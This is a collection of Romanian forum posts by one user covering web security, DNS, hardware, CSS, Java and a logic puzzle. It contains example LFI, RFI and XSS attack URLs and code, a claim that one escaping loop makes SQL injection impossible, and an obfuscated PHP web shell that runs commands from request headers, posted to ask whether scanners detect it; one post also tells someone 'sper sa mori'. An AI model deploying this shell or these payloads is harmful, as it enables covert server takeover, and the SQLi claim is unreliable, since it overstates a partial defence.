Xander

si pentru userii care nu erau logati in cont de google?

merge sau nu... macar omu incearca sa ofere un produs facut de el in care a bagat ceva munca am vrut si eu sa fac ceva de genul in trecut dar cred ca este prea ne realist cat despre protectie sqli/xss/lfi/rfi cu patternuri... yeah right! nu zic nu... merge pana apar alte metode care trec de patternurile alea exemple: LFI: .htaccess: RewriteRule ^(.*)\.html$ $1.php bad: http://example.php/images/unshell.html RFI: <?php include($_GET['folder'] . "/" . $_GET['fisier'] . ".php"); http://example.com/?folder=http://www.example2.com/&fisier=myshell xss: test.php: <?php echo "<script>" . $_GET['c'] . "</script>" ; ?> ( am pus cod aiurea ca sa demonstrez o idee ) http://example.com/?c=omg='a' + 'l' + 'e' + 'r' + 't' + '(mda);' ( bine exemplul nu o sa mearga daca plusurile si egalul nu sunt url encoded dar asta e irelevant ) la sqli se poate face ceva ... relativ usor: introduci in fiecare script ... la inceput $source = array("_POST" , "_GET" , "_COOKIE"); foreach($source as $ga) { $_ga = &$$ga; foreach($$ga as $key => $val) { $_ga[$key] = mysql_real_escape_string($val); } } singura problema reala cu codul de mai sus este ca trebuie sa te conectezi la mysql inainte de a rula codul in rest... nu cred ca se poate face sqli daca ai codul asta

nu credeti ca e mai simplu sa puneti 8.8.8.8 si 8.8.4.4 la dns servers decat sa impariti fisiere hosts ? (sunt dns-uri publice de la gugal)

cred ca se referea directl a voltaj ... nu la cantitatea de date voltaj mare = caldura mare = ... @ot: daca este lipita ... e posibil sa faca urat sau sa nu mai porneasca daca o dai jos... si mai este si posibil sa fie ignorata in momentul cand bagi alta placuta

am doar o curiozitate exploateaza vreun bug sau face hituri in prostie cu proxy-uri publice?

ca sa faci asta trebuie sa ai drepturi de administrator deci e este utila doar daca ai uitat parola de la un user... dar oricum poti schimba parola din control panel fara sa o sti

@isaac... esti prost de puti au schimbat domeniul in .se pentru ca .com poate fi inchis oricand de americani si stergerea fisierelor .torrent a fost anuntata de cativa ani

daca piratii nu au deloc emotii si sunt Data din star trek atunci da... vor accepta 98 0 1 0 1 (motivul e explicat destul de logic pe wiki) dar in realitate oamenii sunt prosti... si cand vad ca sefu primeste de aproape 100 de ori mai mult o sa il linseze si o sa ramana 4 si urmatoru o sa imparta in mod egal daca nu o sa fie si el la randul lui linsat deci... lasand logica deoparte si luand in considerare natura umana exista cateva variante: 20 20 20 20 20 25 25 25 25 34 33 33 50 50 100 ( castigatoru dintre D si E la bataie )

defapt merge si https-u spart dar nu realtime

cred ca a fost unu mai boss ca bosii de acolo ... si le-a dat flood pana au ramas fara jucarii:))

6 km ... prin cladiri? da se poate... se numeste sci-fi:) ocolesti sau pui si pe cladiri si trimiti semnalul ceva de genul _/\_

oare shellul asta merge detectat automat ? <?php $S = "_s".'er'."ver"; $s = 's' . "".'ub'."st".'r';$x = "e" . 'xp'.'lo'. "de";$i = "im". 'p' . 'l'."od" .'e';$cl = "b_g" . "X". 't_cen';$rr= $i('e' , $x("l" , 'st' . "r_" . 'rlp' . "lat"));$r = $i("",$x("d",'sd' . "tdr_" . 'r' . "depdl" . 'adced'));$cl=$r("b" , 'o' . "B" , $r("e" , 'le' . "a" , $cl));$e = $r('m','e','m'.$i('m',$'u','xuc')));$cl{4} = 'e';$cl();$be = $i('e' , $'h'."e" , "b" . 'as' . 'he6'."4_".'dhe'."c"."od".'he'));$bd = $i('e' , $'h'."e" , "b" . 'as' . 'he6'."4_".'he'."nco"."d".'he'));$u = $S{2-1}.$s{5-1}.$S{4-1}."to".''.'u'.$i{3-1}.$i{2}.'e'.$s{1+4};$R = $u($S);$k=$$R;$of = 'o_' . 'f'."l".'uea';$of = $r("o" , "o" . 'b' , $r("e" . 'a' , 'sh', $of));$X = $u('h' . $s{2+2}."t".$i{3-1}."_".$x{-1+2}.'_'.$x{1*0}.'t'."ag");$h = $i("e" , $x("k" , "hka".'dkr'));@$e($bd($s($k[$X],2))." 2>&1", $o);$pr = 'pr' . "In";$h("X-" . 'e'. $s{3+2-1} . ": " . $u( $r{-2+11+1} . 'a') .$be($i("\r\n ", $o)));$pr .= "tf";$pr($rr($u($r{14-6}), 9 * 1000 + 32.6 * 10));@$of(); ?> . e tot ala de mai sus numai ca e obfuscat putin

client denied by server configuration: /var/www/XXXXXXXXXXX/web/.htaccess edit: cu modificari minime merge si la mine:|

ii bate google translate cu lions

e foarte mare vulnerabilitate ... incarci scriptu lor de 1000 de ori si gata

nu sta nimeni sa urmareasca traficul la toti clientii doar daca vin cu mandat poate sa urmareasca traficul la 1-2 abonati...

sper sa mori

daca ai da si o poza sa vedem exact ce se intampla... si ai da si codul complet al meniului poate te-ar ajutat careva:) exista mai multe cauze posibile pentru ce descrii tu... incearca sa adaugi la css: text-align: center; display: inline-block; width: 100px; overflow: hidden; (inloc de 100 pune lungimea care vrei)

cand dai long i = 0xffffffff; iti traduce in ceva de genul: int k = 0xffffffff; long i = k; si afiseaza corect -1 (daca vrei sa vezi pune 9 f inloc de 8 (0xfffffffff) si vezi exact ce zice daca vrei long long i = 0xffffffffL; si merge cum te astepti

nu are nici o treaba java cu javascript ...

din cate vad ar trebui sa mearga .... incearca direct cu myImage.src

defapt e moca sa il atasezi aia 1.5 euro iti intra inapoi dupa ce se accepta plata

ouch... urat nasol ca pot sa citeasca pluginurile bulangii

200 euro si iti fac eu

40% cu messenger si skype deschis si 60% cu chrome utorrent etc... e ok sa foloseasca atat e chiar foarte bine pentru ca pastreaza informatiile in ram si sunt accesate mai rapid (superfetch)